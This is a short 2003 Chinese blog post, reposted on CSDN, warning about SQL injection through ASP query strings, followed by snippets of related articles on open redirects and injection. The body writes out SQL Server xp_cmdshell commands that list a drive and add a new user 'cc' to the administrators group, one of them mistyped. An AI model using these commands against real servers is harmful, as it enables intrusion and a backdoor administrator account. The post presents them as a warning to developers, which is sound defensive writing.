不可忽视URL漏洞

最新推荐文章于 2024-06-20 00:15:00 发布
最新推荐文章于 2024-06-20 00:15:00 发布
阅读量2.3k 收藏
点赞数
分类专栏: Web开发 文章标签: url sqlserver 数据库 测试 user 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jaron/article/details/15137
版权

/* written by Jaron(贾俊) ,2003-11-04 */
/* 原出处:B/S WEB技术中文网 http://www.jaron.cn ;*/
/* 欢迎访问我的网站: http://www.jaron.cn  http://blog.jaron.cn*/
/* 如对本文有疑问,请在网站留言 /*
/* 转载请注明出处和保留此版权信息 */
/* 欢迎使用SiteManager网站管理系统 http://sitemanager.cnzone.net http://demo.jaron.cn ; */

    前些时候,公安机关破获了一家网络公司的程序被盗的案件,分析了一下,主要问题还是出在URL漏洞上。
    测试程序是否存在URL漏洞,最简单的方法就是在Request.QueryString上加一个',如 show.asp?id=1 ,改成 show.asp?id=1' ,打开IE高级选项中的“显示友好HTTP错误信息”,看看是不是显示了“字符串 '' 之前有未闭合的引号”? 
    如果数据库是SQLSERVER,试试在查询分析器里执行以下指令:exec master.dbo.xp_cmdshell  dir c:/
    黑客便可利用exec master.dbo.xp_cmdshell 干任何事情了,那么利用这个指令,便很轻松的在您的系统内建立用户 exec master.dbo.xp_cmdshell  'net user cc cc /add' ; exec master.dbo.xp_cmdshell 'net localhost administrators cc /add',以后的事情就不得而知了。
   注: 非法侵入他人计算机系统,可能会被处以三年以下有期徒刑。

Jaron
关注
专栏目录
URL跳转漏洞
qq_52223347的博客
01-05 786
url重定向 漏洞介绍: URL 跳转漏洞是指后台服务器在告知浏览器跳转时,未对客户端传入的重定向地址进行合法性校验,导致用户浏览器跳转到钓鱼页面的一种漏洞。 实现方式: META标签跳转 Javascript跳转 Header头跳转 通过以GET或者POST的方式接收将要跳转的URL,然后通过上面的几种方式的其中一种来跳转到目标URL。一方面,由于用户的输入进入Meta,javascript,http头,所以都可能发生相应的漏洞,如xss等等,但是同时,即使只是对于URL跳转本身功能方面就存在一个缺陷
web渗透常见漏洞总结
gugonggugong的博客
01-14 3522
一、SQL注入 1. 原理 SQL:结构化查询语言 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注射能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 当应用程序使用输入内容来构造动态sql语句以访问数据库时,发生sql注入攻击;如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也发生sql注入。 2. 不同数据库的注入 MySQL access...
URL跳转漏洞(总结)
热门推荐
稳而思静 慢而有为
04-24 1万+
URL跳转漏洞描述 服务端未对传入的跳转url变量进行检查和控制,可导致恶意用户构造一个恶意地址,诱导用户跳转到恶意网站。 跳转漏洞一般用于钓鱼攻击,通过跳转到恶意网站欺骗用户输入用户名和密码来盗取用户信息,或欺骗用户进行金钱交易;还可以造成xss漏洞。 常见的可能产生漏洞的参数名redirect,redirect_to,redirect_urlurl,jump,jump_to,target,t...
网站建设不可忽视7个细节.rar
07-09
以下是基于标题“网站建设不可忽视7个细节”所涉及的关键知识点: 1. **响应式设计**:随着移动设备的普及,确保网站在不同设备上都能提供良好的浏览体验至关重要。响应式设计可以自动调整网页布局,适应手机、平板...
PHP漏洞全解(详细介绍)
10-27
防范措施是避免使用eval函数来执行不可控的输入数据。 3. 客户端脚本攻击(ScriptInsertion) 客户端脚本攻击是指攻击者通过Web表单或者URL参数等方式向客户端注入恶意脚本代码。这些脚本在用户的浏览器中执行,可能...
12、URL跳转漏洞
lqyzkn的博客
07-23 363
内容
WEB安全基础-URL跳转漏洞
IT1995的博客
01-22 1万+
URL跳转漏洞:借助未验证的URL跳转,将应用程序引导到不安全的第三方区域,从而导致的安全问题。     URL跳转常见原理   中奖率,或者给XXX投票 如http://qt.qq.com/safecheck.html?flag=1&url=http://jtvx518.cc 将恶意网站与正规网站混合在一起,   实现URL的跳转: Header头跳转 Javascript
URL重定向漏洞
剁椒鱼头没剁椒的博客
08-30 3919
以上就是关于url跳转漏洞的一些相关内容。这个漏洞是属于比较好理解的,适合刚入门的新手学习。这个漏洞本身是低危的,当在渗透测试时如果发现存在这个漏洞的时候,不妨看看有没有机和其他漏洞配合扩大攻击。
研究人员在广泛使用的URL解析器库中发现漏洞
Free雅轩的博客
01-24 214
有研究人员对 16 个不同的统一资源定位符( URL )解析库进行调研后,发现了不一致和混乱的情形,网络安全公司 Claroty 和 Synk 联合开展了深入的分析工作,本文介绍了具体成果。 日前,有研究人员对 16 个不同的统一资源定位符( URL )解析库进行调研后,发现了不一致和混乱的情形,它们可以被不法分子用来绕过验证机制,为众多攻击途径敞开大门。随后,两家网络安全公司 Claroty 和 Synk 联合开展了深入的分析工作,结果发现,用C 、JavaScript 、 PHP 、 Pytho
URL 重定向漏洞
子洋 Blog
02-13 1467
漏洞本身是无法直接危害系统和用户安全的,按照通用漏洞定级标准: URL 跳转漏洞属于低危漏洞,但该漏洞可以结合其他漏洞加以深入利用,主要的利用方式不限于钓鱼攻击,在工信部远程检测工作中,该漏洞定义为。开放重定向(Open Redirect),也叫 URL 跳转漏洞,是指服务端未对传入的 URL 变量进行检查和控制,导致诱导用户跳转到恶意网站,由于是从可信的站点跳转出去的,用户比较信任。代码层忽视 URL 跳转漏洞,或不知道/不认为这是个漏洞。/ 绕过,可以尝试多个正斜杠一起用,如/、//、///
URL跳转漏洞学习总结
weixin_45116657的博客
11-05 5232
相关背景 现在web应用越来越多的需要和其他第三方应用交互,以及在自身应用内部根据不同的逻辑引向不同的页面。例如一个典型的场景就是:web站点可以使用第三方账号(如qq,微博等)进行登录,在登录时就发生跳转,如果在这个过程中没有做好安全策略就产生安全漏洞。例如可以利用恶意的URL跳转进行钓鱼等。 URL重定向(301/302) 301重定向:当域名或者网址永久弃用后,为了方便可以将此域名或网...
十几款应用广泛的第三方URL解析库被曝8个漏洞
smellycat000的专栏
01-11 430
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全公司 Claroty 和 Synk 联合分析了16款不同的第三方 URL 解析库,结果发现八个不一致和混淆问题,可用于绕过验证并...
浅谈 URL 解析与鉴权中的陷阱
有价值炮灰
07-31 501
说到 URL 解析,想必关注 Web 安全的朋友们都看过 Orange 那篇,其中对不同语言中的 URL Parser 做了较为详尽的分析。该议题主要关注不同 Parser 处理 URL 时的域名部分,以实现针对 SSRF 的绕过和后利用。本文的关注点则有所不同,主要是针对 URL 解析的路径部分。因为 URL 的路径部分通常涉及到资源和服务的路由,以及对应的鉴权校验。通常我们在漏洞挖掘和渗透测试时都收集过一些鉴权绕过的 “Tricks”,但很多时候并不了解其所以然,每每测试结束后总觉得缺少了些什么。
关于URL解析漏洞在PDF文档中的利用
weixin_33694172的博客
11-27 133
作者:zwell右键另存再打开测试文档,否则调用IE的插件打开,测试失败。如果你硬要通过点击打开的话,点击这里吧,嘿嘿,这本身也是IE的一个解析漏洞。在[url]http://seclists.org/fulldisclosure/2007/Oct/0068.html[/url]看到这个漏洞的时候,一时还没有想到怎么利用。后来结合去年有一个关于pdf actions安全隐...
Web安全基础学习:URL重定向漏洞之不安全的URL跳转
最新发布
qq_51862722的博客
06-20 1116
URL跳转漏洞:也叫开放重定向漏洞URL 跳转漏洞是指后台服务器在告知浏览器跳转时,未对客户端传入的重定向地址进行合法性校验,通过修改恶意站点的 URL 值,攻击者可能成功发起网络钓鱼诈骗并窃取用户凭据。a 标签跳转、meta 标签内跳转、JavaScript 跳转、header 头跳转url注:使用时将example替换为原地址,作者自用的Payload字典包含了FUZZ测试,使用者需要自行判断。
解决Web安全:文件上传漏洞与SQL注入分析
最后,不在URL中显示上传文件的相对路径,可以防止攻击者通过猜测路径获取敏感信息。 除了文件上传漏洞,SQL注入是另一个严重的问题。SQL注入允许攻击者通过输入恶意的SQL代码来获取、修改或者删除数据库中的数据。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值